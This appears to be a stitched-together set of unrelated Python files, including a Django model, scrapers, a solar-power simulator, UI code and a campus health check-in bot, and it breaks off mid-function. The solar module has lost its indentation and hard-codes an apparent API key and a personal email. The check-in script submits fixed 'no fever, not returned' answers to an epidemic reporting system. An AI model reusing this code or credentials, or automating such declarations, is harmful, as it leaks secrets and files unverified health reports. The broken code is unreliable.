# Create your models here.
class Watch(models.Model):
    """A watch listed for sale, owned by a (nullable) user."""
    # User details; SET_NULL keeps the listing alive if the owner is deleted
    user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    # Watch brand - prefix brand options
    WATCH_BRAND = [
        ('ROLEX', 'ROLEX'),
        ('OMEGA', 'OMEGA'),
        ('HUBLOT', 'HUBLOT'),
    ]
    watch_brand = models.CharField(
        max_length=30,
        choices=WATCH_BRAND,
        default='ROLEX',
        blank=False
    )
    # Allow user to enter watch model
    watch_model = models.CharField(
        max_length=100,
        blank=False
    )
    # Description for the watch
    description = models.TextField(max_length=500)
    # Sale price of the watch
    price = models.IntegerField(
        blank=False,
    )
    # Watch available for sale
    STATUS = [
        ('Available', 'Available'),
        ('Sold', 'Sold'),
    ]
    status = models.CharField(
        max_length=10,
        choices=STATUS,
        default='Available'
    )
    # Picture for the watch
    cover = CloudinaryField('image')
    def __str__(self):
        # Human-readable label, e.g. "ROLEX Submariner"
        return (self.watch_brand + " " + self.watch_model)
|
__author__ = 'tangjia'
import urllib2
import cookielib
import requests
# NOTE(review): `headers` is defined but never attached to any request.
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/600.4.8 (KHTML, like Gecko) Version/8.0.3 Safari/600.4.8'}
# response = urllib2.urlopen("http://www.javlibrary.com/cn/");
tbLoginUrl = "http://fahai.gnetconferencing.com/tomain.do"
file = "cookie.txt"  # NOTE(review): shadows the Python 2 builtin `file`
# NOTE(review): CookieJar() takes a CookiePolicy, not a filename -- only
# FileCookieJar subclasses (LWPCookieJar/MozillaCookieJar) accept filenames.
cookie = cookielib.CookieJar(file);
# NOTE(review): HTTPCookieProcessor is passed as a class (not instantiated
# with `cookie`), and this opener is never used below.
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor)
taobao = urllib2.urlopen(tbLoginUrl)
resp = taobao.read().decode("gbk")
print(resp)
# urllib2.install_opener(opener)
# response = opener.open(tbLoginUrl)
# content = response.read()
# print(content)
|
from datos.connection import Connection
class AlumnoData():
    """Data-access helpers for the 'alumnos' MongoDB collection."""
    @staticmethod
    def crearAlumno(alumno):
        """Insert a single student document."""
        collection = Connection.connect().alumnos
        collection.insert_one(alumno)
    @staticmethod
    def traerAlumnos():
        """Return a cursor over every student document."""
        collection = Connection.connect().alumnos
        return collection.find({})
|
class Solution(object):
    def removeDuplicates(self, nums):
        """
        Remove duplicates from a sorted list in place (LeetCode 26).

        :type nums: List[int]
        :rtype: int -- the count k of unique elements; nums[:k] holds them
            in their original order.

        Bugfix: the previous version returned list(set(nums)), which neither
        deduplicates in place, nor returns the documented int, nor preserves
        order for general inputs.
        """
        if not nums:
            return 0
        write = 1  # next slot for a new unique value
        for i in range(1, len(nums)):
            if nums[i] != nums[write - 1]:
                nums[write] = nums[i]
                write += 1
        return write
# Quick manual check of the solution above.
nums = [1,1,2]
a = Solution()
print(a.removeDuplicates(nums))
# https://leetcode-cn.com/problems/remove-duplicates-from-sorted-array/
class Employee:
    """Toy class demonstrating class attributes vs. instance attributes."""
    company = "Google"  # class attribute, shared by all instances
    salary = 100  # class attribute; an assignment on an instance shadows it
# Assigning through an instance creates an instance attribute that shadows
# the class attribute for that instance only.
saquib = Employee()
md = Employee()
saquib.salary = 5000
# md.salary = 6000
print(saquib.salary)  # 5000: the instance attribute wins
print(md.salary)  # 100: falls back to the class attribute
saquib.company = "Fortuitycorps"
print(saquib.company)
from PySAM.PySSC import *
import pandas as pd
import numpy as np
import requests,io
from scipy.stats import norm
from scipy import linalg
from math import sqrt,exp,log,cos,pi
class SolarSite(object):
""" Pull NSRDB site by sending a request.
Parameters
----------
lat : float
Latitude in decimal degrees
lon : float
Longitude in decimal degrees
"""
def __init__(self, lat,lon):
    # Store the site coordinates used by get_nsrdb_data's NSRDB request URL.
    self.lat = lat
    self.lon = lon
def get_nsrdb_data(self,year,leap_year,interval,utc):
""" Pull NSRDB site by sending a request.
Parameters
----------
year : int
Choose year of data. May take any value in the interval [1998,2019]
leap_year : bool
Set leap year to true or false. True will return leap day data if present, false will not.
interval: string
Set time interval in minutes, i.e., '30' is half hour intervals. Valid intervals are 30 & 60.
utc : bool
Specify Coordinated Universal Time (UTC), 'true' will use UTC, 'false' will use the local time zone of the data.
NOTE: In order to use the NSRDB data in SAM, you must specify UTC as 'false'. SAM requires the data to be in the
local time zone.
"""
api_key = 'KgmyZTqyzgQOOjuWoMxPgMEVVMAG0kMV521gJPVv' # NSRDB api key
attributes = 'ghi,clearsky_ghi,dhi,clearsky_dhi,dni,clearsky_dni,wind_speed,air_temperature,cloud_type,fill_flag,wind_direction'
your_name = 'pySODA' # Your full name, use '+' instead of spaces.
reason_for_use = 'Distributed+PV+Generation' # Your reason for using the NSRDB.
your_affiliation = 'LBNL-ASU' # Your affiliation
your_email = 'ilosadac@asu.edu' # Your email address
mailing_list = 'false'
# Declare url string
url = 'https://developer.nrel.gov/api/solar/nsrdb_psm3_download.csv?wkt=POINT({lon}%20{lat})&names={year}&leap_day={leap}&interval={interval}&utc={utc}&full_name={name}&email={email}&affiliation={affiliation}&mailing_list={mailing_list}&reason={reason}&api_key={api}&attributes={attr}'\
.format(year=year, lat=self.lat, lon=self.lon, leap=str(leap_year).lower(), interval=interval,\
utc=str(utc).lower(), name=your_name, email=your_email, mailing_list=mailing_list, \
affiliation=your_affiliation, reason=reason_for_use, api=api_key, attr=attributes)
# Return just the first 2 lines to get metadata:
r=requests.get(url)
if r.status_code==400:
raise NameError(r.json()["errors"][0])
meta = pd.read_csv(io.StringIO(r.content.decode('utf-8')),nrows=1).T
df = pd.read_csv(io.StringIO(r.content.decode('utf-8')),skiprows=2)
idx = pd.date_range(start='1/1/{yr}'.format(yr=year), freq=interval+'Min', end='12/31/{yr} 23:59:00'.format(yr=year))
if leap_year==False:
idx = idx[(idx.day != 29) | (idx.month != 2)]
df=df.set_index(idx)
self.resource_data = df
self.meta_resource_data = meta.T.to_dict('r')[0]
return df
def generate_solar_power_from_nsrdb(self,clearsky,capacity,DC_AC_ratio,tilt,azimuth,inv_eff,losses,array_type,year = None,leap_year = None,interval = None,utc = None):
""" Generate PV power time series.
Parameters
----------
clearsky : bool
True returns clearsky power, false returns "simulated" output
capacity : float
System capacity in MW
DC_AC_ratio : float
DC/AC ratio (or power ratio). See https://sam.nrel.gov/sites/default/files/content/virtual_conf_july_2013/07-sam-virtual-conference-2013-woodcock.pdf
tilt : float
Tilt of system in degrees
azimuth : float
Azimuth angle (in degrees) from north (0 degrees)
inv_eff : float
Inverter efficiency (in %)
losses : float
Total system losses (in %)
array_type : int
# Specify PV configuration (0=Fixed, 1=Fixed Roof, 2=1 Axis Tracker, 3=Backtracted, 4=2 Axis Tracker)
year : int
Year of data. May take any value in the interval [1998,2018]
leap_year : bool
Leap year to true or false. True will return leap day data if present, false will not.
interval: string
Time interval in minutes, i.e., '30' is half hour intervals. Valid intervals are 30 & 60.
utc : bool
Specify Coordinated Universal Time (UTC), 'true' will use UTC, 'false' will use the local time zone of the data.
NOTE: In order to use the NSRDB data in SAM, you must specify UTC as 'false'. SAM requires the data to be in the
local time zone.
"""
if not hasattr(self,"resource_data"):
args = [arg==None for arg in [year,leap_year,interval,utc]]
if any(args):
raise NameError("Missing input: year,leap_year,interval,utc")
else:
self.year = year
self.leap_year = leap_year
self.interval = interval
self.utc = utc
IrradianceData.get_nsrdb_data(self)
if clearsky==True:
clearsky_str="Clearsky "
else:
clearsky_str=""
ssc = PySSC()
# Resource inputs for SAM model:
wfd = ssc.data_create()
ssc.data_set_number(wfd, 'lat'.encode('utf-8'), self.lat)
ssc.data_set_number(wfd, 'lon'.encode('utf-8'), self.lon)
ssc.data_set_number(wfd, 'tz'.encode('utf-8'), self.meta_resource_data["Time Zone"])
ssc.data_set_number(wfd, 'elev'.encode('utf-8'), self.meta_resource_data["Elevation"])
ssc.data_set_array(wfd, 'year'.encode('utf-8'), self.resource_data.Year)
ssc.data_set_array(wfd, 'month'.encode('utf-8'), self.resource_data.Month)
ssc.data_set_array(wfd, 'day'.encode('utf-8'), self.resource_data.Day)
ssc.data_set_array(wfd, 'hour'.encode('utf-8'), self.resource_data.Hour)
ssc.data_set_array(wfd, 'minute'.encode('utf-8'), self.resource_data.Minute)
ssc.data_set_array(wfd, 'dn'.encode('utf-8'), self.resource_data["{}DNI".format(clearsky_str)])
ssc.data_set_array(wfd, 'df'.encode('utf-8'), self.resource_data["{}DHI".format(clearsky_str)])
ssc.data_set_array(wfd, 'wspd'.encode('utf-8'), self.resource_data['Wind Speed'])
ssc.data_set_array(wfd, 'tdry'.encode('utf-8'), self.resource_data.Temperature)
# Create SAM compliant object
dat = ssc.data_create()
ssc.data_set_table(dat, 'solar_resource_data'.encode('utf-8'), wfd)
ssc.data_free(wfd)
# Specify the system Configuration
ssc.data_set_number(dat, 'system_capacity'.encode('utf-8'), capacity)
ssc.data_set_number(dat, 'dc_ac_ratio'.encode('utf-8'), DC_AC_ratio)
ssc.data_set_number(dat, 'tilt'.encode('utf-8'), tilt)
ssc.data_set_number(dat, 'azimuth'.encode('utf-8'), azimuth)
ssc.data_set_number(dat, 'inv_eff'.encode('utf-8'), inv_eff)
ssc.data_set_number(dat, 'losses'.encode('utf-8'), losses)
ssc.data_set_number(dat, 'array_type'.encode('utf-8'), array_type)
ssc.data_set_number(dat, 'gcr'.encode('utf-8'), 0.4) # Set ground coverage ratio
ssc.data_set_number(dat, 'adjust:constant'.encode('utf-8'), 0) # Set constant loss adjustment
# execute and put generation results back into dataframe
mod = ssc.module_create('pvwattsv5'.encode('utf-8'))
ssc.module_exec(mod, dat)
df=pd.DataFrame()
df['generation'] = np.array(ssc.data_get_array(dat, 'gen'.encode('utf-8')))
df.index = self.resource_data.index
# free the memory
ssc.data_free(dat)
ssc.module_free(mod)
self.cloud_type = self.resource_data['Cloud Type']
self.solar_power_from_nsrdb = df
self.capacity = capacity
return df
def generate_high_resolution_power_data(self, resolution, date):
""" Generate PV power time series.
Parameters
----------
resolution : string
Resolution of time series. Recommended values are "1S","30S","1min","5min". For more examples, see Pandas DateOffset objects
https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#dateoffset-objects
date : string
Date in YYYY-MM-DD format. For example "2015-07-14"
"""
ts = self.solar_power_from_nsrdb[date].resample("1S").interpolate(method="linear")
ts *= (7.5/self.capacity)
ct = self.cloud_type[date].resample("1S").pad()
σ = 0.0003447
λm = np.array([999999999, 999999999 , 3.2889645, 3.9044665, 3.2509495, 0, 4.1906035, 3.097432 , 4.088177,3.9044665,999999999,3.2889645,3.2889645])
λw = np.array([5.977229, 5.804869, 6.503102, 6.068099, 5.879129, 0, 4.834679, 5.153073, 6.661633,6.068099,5.977229,6.503102,6.503102])
pm = np.array([0.001250, 0.002803, 0.009683, 0.005502, 0.018888, 0, 0.000432, 0.007383, 0.003600,0.005502,0.001250,0.009683,0.009683])
pw = np.array([0.001941, 0.008969, 0.003452, 0.002801, 0.004097, 0, 0.001111, 0.004242, 0.008000,0.002801,0.001941,0.003452,0.003452])
df = ts[ts.values>0]
df["CloudType"] = ct[df.index]
M_hat = 600
N = len(df)
# N = 86400
hm = np.array([exp(-t**2/2)*cos(5*t) for t in np.linspace(-4,4,M_hat)])
hw = np.array([0.54-0.46*cos(2*pi*t/(M_hat-1)) for t in range(0,M_hat)]);
padding1 = np.zeros(N - M_hat, hm.dtype)
padding2 = np.zeros(N - M_hat - 1, hm.dtype)
first_col1 = np.r_[hm, padding1]
first_row1 = np.r_[hm[0], padding2]
first_col2 = np.r_[hw, padding1]
first_row2 = np.r_[hw[0], padding2]
Tm = linalg.toeplitz(first_col1, first_row1)
Tw = linalg.toeplitz(first_col2, first_row2)
zw = []
zm = []
η = np.zeros(N)
for i in range(0,N-M_hat):
if df["CloudType"].values[i]<2:
zm.append(0)
zw.append(0)
else:
zm.append(np.random.exponential(1/λm[df["CloudType"].values[i]]))
zw.append(np.random.exponential(1/λw[df["CloudType"].values[i]]))
zm = np.array(zm).reshape(-1,1)
zw = np.array(zw).reshape(-1,1)
randm = np.random.rand(len(zm))
randw = np.random.rand(len(zw))
bm = np.zeros(len(zm))
bw = np.zeros(len(zw))
for i in range(0,len(zm)):
if randm[i]>1-pm[df["CloudType"][i]]:
bm[i] = 1
if randm[i]>1-pw[df["CloudType"][i]]:
bw[i] = 1
boolean = df["CloudType"].values<2
η[boolean] = self.trunc_gauss(0,df.generation[boolean],df.generation[boolean],σ,sum(boolean))
generated_ts = df.generation.values.reshape(-1,1)+(abs(Tm))@(bm.reshape(-1,1)*zm)-Tw@(bw.reshape(-1,1)*zw)+η.reshape(-1,1)
ts["HighRes"] = 0.0
ts.loc[df.index,"HighRes"] = generated_ts.T[0]
ts.HighRes[ts.HighRes<0] = 0
ts.HighRes *= self.capacity/7.5
return pd.DataFrame(ts["HighRes"].resample(resolution).mean())
def trunc_gauss(self,a,b,mu,sigma,N):
u = np.random.rand(N)
alpha, beta = (a - mu)/sqrt(sigma), (b - mu)/sqrt(sigma)
before_inversion = norm.cdf(alpha) + u*(norm.cdf(beta)-norm.cdf(alpha))
x = norm.ppf(before_inversion)*sqrt(sigma)
return x
|
__author__ = 'shikun'
# Ways of locating page elements
class GetVariable(object):
    """Constant pool for the UI test framework: element-locator strategies,
    platform/browser names, action labels, error codes and Android key codes."""
    NAME = "name"
    ID = "id"
    XPATH = "xPath"
    INDEX = "index"
    find_element_by_id = "ID"
    find_element_by_xpath = "XPath"
    find_element_by_class_name = "ClassName"
    find_element_by_name = "Name"
    # Not supported yet (plural / link-text locator strategies)
    find_elements_by_id = "IDS"
    find_elements_by_name = "by_names"
    find_element_by_link_text = "by_link_text"
    find_elements_by_link_text = "by_link_texts"
    find_elements_by_xpath = "by_xpaths"
    find_elements_by_class_name = "class_names"
    SELENIUM = "selenium"
    APPIUM = "appium"
    ANDROID = "android"
    IOS = "ios"
    IE = "ie"
    FOXFIRE = "foxfire"
    CHROME = "chrome"
    # Action labels (Chinese UI strings used as dispatch keys):
    CLICK = "点击"          # click
    SWIPELEFT = "左滑"      # swipe left
    SWIPERIGHT = "右滑"     # swipe right
    SWIPETOP = "上滑"       # swipe up
    SWIPEDOWN = "下滑"      # swipe down
    SEND_KEYS = "输入"      # type text
    BACK = "返回"           # go back
    # Error codes (written as octal literals; 00 evaluates to plain 0)
    ElementNotfound = 00
    SendKeysError = 0o1
    ClickError = 0o2
    SwitchUiError = 0o3
    SwipeError = 0o4
    # assert
    SkipError = 11
    AppearError = 12
    WAIT_TIME_LONG = 10
    WAIT_TIME_SHORT = 5
    # Assertion actions
    SKIP = "断言跳转"       # assert a navigation happened
    APPEAR = "断言出现"     # assert an element appeared
    SWITCHUI = "切换界面"   # switch view
    # Physical (Android) key codes
    KEYCODE_HOME = 3 # HOME key
    KEYCODE_BACK = 4 # back key
    KEYCODE_ENTER = 66 # enter key
    KEYCODE_ESCAPE = 111 # ESC key
|
# code
# Greedy walk on an n x n grid: starting at (0, 0), repeatedly step to the
# cheaper of the right/down neighbour, accumulating cell values until the
# bottom-right corner is reached; one answer per test case.
t = int(input())
for _ in range(t):
    n = int(input())
    temp = list(map(int, input().split()))
    # Fold the flat first line into rows of length n.
    l = [temp[i:i+n] for i in range(0, len(temp), n)]
    del temp
    weight = 1  # NOTE(review): unused
    # Assumes n further comma-separated rows follow -- TODO confirm input format.
    for i in range(n):
        l.append(list(map(int, input().split(','))))
    row = 0
    col = 0
    suml = 0  # running path cost (start cell itself is never added)
    while True:
        if row < n-1 and col < n-1:
            # Step toward the smaller of the two reachable neighbours.
            a = min(l[row+1][col], l[row][col+1])
            if a == l[row+1][col]:
                row += 1
            else:
                col += 1
            suml += a
        if row == n-1 and col < n-1:
            # Bottom row: only rightward moves remain.
            col += 1
            a = l[row][col]
            suml += a
        if row < n-1 and col == n-1:
            # Last column: only downward moves remain.
            row += 1
            a = l[row][col]
            suml += a
        if row == n-1 and col == n-1:
            # Destination reached: count it once more and emit the total.
            a = l[row][col]
            suml += a
            print(suml)
            break
|
numero = int(input("Digite um número: "))

# Accumulate numero! by multiplying every integer from 1 up to numero.
fatorial = 1
for contador in range(1, numero + 1):
    fatorial = fatorial * contador
print(fatorial)
"""
PoliTO VL Downloader modules
Modules to download video-lessons from "Portale della didattica"
of Politecnico di Torino.
:copyright: (c) 2016, robymontyz
:license: BSD
Permission to use, copy, modify, and distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
import requests
import os.path
from bs4 import BeautifulSoup
def login(_username, _password):
    """
    Login using Shibbolet.
    :param _username: Politecnico account username.
    :param _password: Politecnico account password.
    :return: session object, correctly logged in (None if usr or psw are not correct).
    """
    s = requests.session()
    login_data = {
        'j_username': _username,
        'j_password': _password
    }
    s.get('https://login.didattica.polito.it/secure/ShibLogin.php')  # set cookies
    r = s.post('https://idp.polito.it/idp/Authn/X509Mixed/UserPasswordLogin', login_data)
    soup = BeautifulSoup(r.content, 'lxml')
    # check if login attributes are correct (searching for a specific span)
    tag = soup.find('span', id="loginerror")
    if tag is not None and tag.string == 'Errore al login. Verifica username e password':
        return None
    else:
        # if correct: forward the SAML assertion back to the service provider
        # to finish the Shibboleth handshake and authenticate the session.
        tag = soup.find_all('input')
        relay_state_value = tag[0]['value']
        saml_response_value = tag[1]['value']
        data = {
            'RelayState': relay_state_value,
            'SAMLResponse': saml_response_value
        }
        s.post('https://login.didattica.polito.it/Shibboleth.sso/SAML2/POST', data)
        return s
def get_video_urls(s, _course_link):
    """
    Get all the video-lessons URLs starting from the URL of any lesson
    (first one is better).
    :param s: session object
    :param _course_link: URL of the lesson to start with
    :return: a list with all the video-lessons URLs
    """
    # Scrape the left navigation menu for every lesson's relative link.
    page = s.get(_course_link)
    soup = BeautifulSoup(page.content, 'lxml')
    menu = soup.find('ul', id="navbar_left_menu")
    lesson_links = [a.get('href')
                    for item in menu.find_all('li', id="")
                    for a in item.find_all("a")]
    # Resolve each lesson page and pull the direct .mp4 source URL.
    direct_urls = []
    for href in lesson_links:
        lesson_page = s.get('https://didattica.polito.it/portal/pls/portal/' + href)
        lesson_soup = BeautifulSoup(lesson_page.content, 'lxml')
        direct_urls.append(lesson_soup.find('source')['src'])
    return direct_urls
def download_video(s, url, _dir):
    """
    Download a video using the direct link
    :param s: session object
    :param url: direct link to a single video
    :param _dir: download location
    """
    response = s.get(url, stream=True)
    # Strip any fragment/query so only the bare file name remains.
    name = url.split('/')[-1].split('#')[0].split('?')[0]
    target = os.path.join(_dir, name)
    with open(target, 'wb') as out:
        for chunk in response.iter_content(chunk_size=1024):
            out.write(chunk)
    return None
if __name__ == "__main__":
# use for testing
username = 'S012345'
password = 'password'
course_link = 'https://didattica.polito.it/portal/pls/portal/sviluppo.videolezioni.vis?cor=191&lez=8083'
dl_path = '/Users/foo/Downloads/CE/'
# session = login(username, password)
#
# urls = get_video_urls(session, course_link)
#
# for url in urls:
# print url
# # download_video(session, url, dl_path)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_new.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    """Auto-generated PyQt5 UI class (from ui_new.ui); do not hand-edit --
    regenerate with pyuic5 instead."""

    def setupUi(self, MainWindow):
        """Create and lay out all widgets on *MainWindow*."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(800, 600)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Three push buttons and a small text box along the top edge.
        self.pushButton = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton.setGeometry(QtCore.QRect(50, 20, 91, 41))
        self.pushButton.setObjectName("pushButton")
        self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_2.setGeometry(QtCore.QRect(160, 20, 101, 41))
        self.pushButton_2.setObjectName("pushButton_2")
        self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
        self.textEdit.setGeometry(QtCore.QRect(300, 20, 111, 41))
        self.textEdit.setObjectName("textEdit")
        # Main vertical layout area below the button row.
        self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(20, 80, 741, 441))
        self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout.setObjectName("verticalLayout")
        self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton_3.setGeometry(QtCore.QRect(710, 20, 51, 23))
        self.pushButton_3.setObjectName("pushButton_3")
        MainWindow.setCentralWidget(self.centralwidget)
        # Menu bar and status bar.
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 23))
        self.menubar.setObjectName("menubar")
        self.menu = QtWidgets.QMenu(self.menubar)
        self.menu.setObjectName("menu")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.menubar.addAction(self.menu.menuAction())
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        """Apply the translated (Chinese) captions to all widgets."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.pushButton.setText(_translate("MainWindow", "开始测量"))
        self.pushButton_2.setText(_translate("MainWindow", "开始拟合"))
        self.pushButton_3.setText(_translate("MainWindow", "设置"))
        self.menu.setTitle(_translate("MainWindow", "光斑测量"))
|
class PyBill(object):
    """Holds a salary exposed as a read-only property."""

    def __init__(self, salary):
        # Name-mangled (private) storage, readable only via the property.
        self.__salary = salary

    @property
    def salary(self):
        """Read-only access to the salary set at construction time."""
        return self.__salary
|
from collections import OrderedDict
from uuid import uuid4
from rest_framework.exceptions import APIException, ValidationError
from rest_framework.status import (HTTP_400_BAD_REQUEST, HTTP_409_CONFLICT,
HTTP_404_NOT_FOUND)
from rest_framework.views import exception_handler
from .utils import get_status_title
class JsonApiValidationError(ValidationError):
    """ValidationError whose payload follows the JSON-API errors format."""

    def __init__(self, detail):
        rendered = []
        for error in detail.get('errors', []):
            rendered.append(OrderedDict([
                ('status', self.status_code),
                ('title', get_status_title(self.status_code)),
                ('detail', error['detail']),
                ('source', error['source']),
            ]))
        super(JsonApiValidationError, self).__init__({'errors': rendered})
def render_exception(status_code, detail):
    """Build a single-entry JSON-API errors payload for *status_code*/*detail*."""
    error = OrderedDict()
    error['id'] = str(uuid4())
    error['status'] = status_code
    error['title'] = get_status_title(status_code)
    error['detail'] = detail
    return {'errors': [error]}
class JsonApiBadRequestError(APIException):
    """400 Bad Request with a JSON-API friendly default message."""
    status_code = HTTP_400_BAD_REQUEST
    default_detail = (u"The server cannot process the request due to invalid "
                      u"data.")
class JsonApiNotFoundError(APIException):
    """404 Not Found with a JSON-API friendly default message."""
    status_code = HTTP_404_NOT_FOUND
    default_detail = u"Could not find the resource specified"
class JsonApiConflictError(APIException):
    """409 Conflict with a JSON-API friendly default message."""
    status_code = HTTP_409_CONFLICT
    default_detail = u"The server cannot process the request due to a conflict."
class JsonApiFeatureNotAvailableError(JsonApiBadRequestError):
    """400 variant raised when a feature is disabled for the project."""
    default_detail = u"This feature is not available for your project."
class JsonApiGeneralException(APIException):
    """APIException whose status code is chosen per instance."""

    def __init__(self, detail=None, status_code=None):
        # Validate with a real exception: ``assert`` is stripped under
        # ``python -O`` and would silently allow a missing status code.
        if status_code is None:
            raise ValueError("status_code is required")
        self.status_code = status_code
        super(JsonApiGeneralException, self).__init__(detail)
def jsonapi_exception_handler(exc, context):
    """DRF exception handler that wraps errors in a JSON-API payload when the
    client negotiated the ``application/vnd.api+json`` media type."""
    accepts = context['request'].accepted_media_type or ''
    if accepts.startswith('application/vnd.api+json'):
        try:
            exc.detail = render_exception(exc.status_code, exc.detail)
        except AttributeError:
            pass  # Ignore django exceptions (no .detail / .status_code)
    response = exception_handler(exc, context)
    return response
|
import requests
import time
from bs4 import BeautifulSoup
from openpyxl import load_workbook
import datetime
from email.mime.text import MIMEText
import smtplib
import random
import sys
import getopt
# Read account data from an xlsx workbook (currently unused)
def get_info_from_xlsx():
    """Read username/password/email columns from config.xlsx.

    Returns (usernames, passwords, emails, count).
    """
    username = []
    password = []
    userEmail = []
    wb = load_workbook(filename='config.xlsx')
    sheetnames = wb.sheetnames
    sheet = wb[sheetnames[0]]
    row = wb[sheetnames[0]].max_row
    # openpyxl rows are 1-indexed; walk every populated row.
    for rowNum in range(1, row + 1):
        # print(sheet.cell(row=rowNum, column=1).value)
        username.append(sheet.cell(row=rowNum, column=1).value)
        # print(sheet.cell(row=rowNum, column=2).value)
        password.append(sheet.cell(row=rowNum, column=2).value)
        # print(sheet.cell(row=rowNum, column=3).value)
        userEmail.append(sheet.cell(row=rowNum, column=3).value)
    # NOTE(review): ``sum`` shadows the builtin of the same name.
    sum = len(username)
    return username, password, userEmail, sum
# Read account data from config.txt
def get_info_from_txt():
    """Read login accounts from ``config.txt``.

    Each non-empty line is ``username,password,email,name`` (a trailing
    comma is tolerated).  Returns five values:
    (usernames, passwords, emails, names, count).
    """
    usernames = []
    passwords = []
    emails = []
    names = []
    count = 0
    # ``with`` closes the file (the original leaked the handle); renamed
    # locals so the builtins ``list`` and ``sum`` are no longer shadowed.
    with open('config.txt', 'r', encoding='utf-8') as config_file:
        for line in config_file:
            # Drop surrounding whitespace, then any trailing/leading comma.
            fields = line.strip().strip('\n').strip(',').split(',')
            usernames.append(fields[0])
            passwords.append(fields[1])
            emails.append(fields[2])
            names.append(fields[3])
            count += 1
    return usernames, passwords, emails, names, count
# Log in; prepares the session (cookies) for the later requests
def login(s, headers, username, password):
    """POST the credentials and return the server's response body (text)."""
    login_url = 'http://yiqing.ctgu.edu.cn/wx/index/loginSubmit.do'
    data = {
        'username': '',
        'password': '',
    }
    data['username'] = username
    data['password'] = password
    r = s.post(url=login_url, headers=headers, data=data)
    # Wait so the server finishes processing before the next request
    time.sleep(20)
    return r.text
# Fetch the HTML page that carries the report form data
def get_student_info(s, headers):
    """Return the apply-page HTML for the logged-in session."""
    student_info_url = 'http://yiqing.ctgu.edu.cn/wx/health/toApply.do'
    r = s.get(url=student_info_url, headers=headers)
    # print(r.text)
    # Wait so the server finishes processing before the next request
    time.sleep(20)
    return r.text
# Fetch the page that shows whether today's report succeeded
def get_success_send_info(s, headers):
    """Return the main-page HTML, which carries the report status text."""
    success_send_info_url = 'http://yiqing.ctgu.edu.cn/wx/health/main.do'
    r = s.get(url=success_send_info_url, headers=headers)
    # print(r.text)
    time.sleep(30)
    return r.text
# Parse the HTML and collect the hidden form fields into the POST payload
def student_info_parse(html):
    """Extract the apply-form fields from *html* into the dict to POST back."""
    bs = BeautifulSoup(html, 'lxml')
    data = {
        'ttoken': bs.find(attrs={'name': 'ttoken'})['value'],
        # Province
        'province': bs.find(attrs={'name': 'province'})['value'],
        # City
        'city': bs.find(attrs={'name': 'city'})['value'],
        # County / district
        'district': bs.find(attrs={'name': 'district'})['value'],
        # Region code: first six digits of the ID-card number
        'adcode': bs.find(attrs={'name': 'adcode'})['value'],
        'longitude': bs.find(attrs={'name': 'longitude'})['value'],
        'latitude': bs.find(attrs={'name': 'latitude'})['value'],
        # Confirmed COVID-19 infection?
        'sfqz': bs.find(attrs={'name': 'sfqz'})['value'],
        # Suspected infection?
        'sfys': bs.find(attrs={'name': 'sfys'})['value'],
        'sfzy': bs.find(attrs={'name': 'sfzy'})['value'],
        # In quarantine?
        'sfgl': bs.find(attrs={'name': 'sfgl'})['value'],
        # Status; statusName: "normal"
        'status': bs.find(attrs={'name': 'status'})['value'],
        # NOTE(review): 'sfgr' appears twice in this literal; the scraped
        # value below is overridden by the hard-coded '否' further down.
        'sfgr': bs.find(attrs={'name': 'sfgr'})['value'],
        'szdz': bs.find(attrs={'name': 'szdz'})['value'],
        # Mobile phone number
        'sjh': bs.find(attrs={'name': 'sjh'})['value'],
        # Emergency contact name
        'lxrxm': bs.find(attrs={'name': 'lxrxm'})['value'],
        # Emergency contact phone number
        'lxrsjh': bs.find(attrs={'name': 'lxrsjh'})['value'],
        # Fever?
        'sffr': '否',
        'sffy': '否',
        'sfgr': '否',
        'qzglsj': '',
        'qzgldd': '',
        'glyy': '',
        'mqzz': '',
        # Returned to campus?
        'sffx': '否',
        # Other
        'qt': '',
    }
    # print(data)
    return data
# Parse the HTML and extract the report-status text
def success_send_info_parse(html):
    """Return the status text from the green notice span on the main page."""
    bs = BeautifulSoup(html, 'lxml')
    text = bs.find('span', {"class": "normal-sm-tip green-warn fn-ml10"}).get_text()
    # print(text)
    return text
# POST the collected form data to the server
def sent_info(s, headers, data):
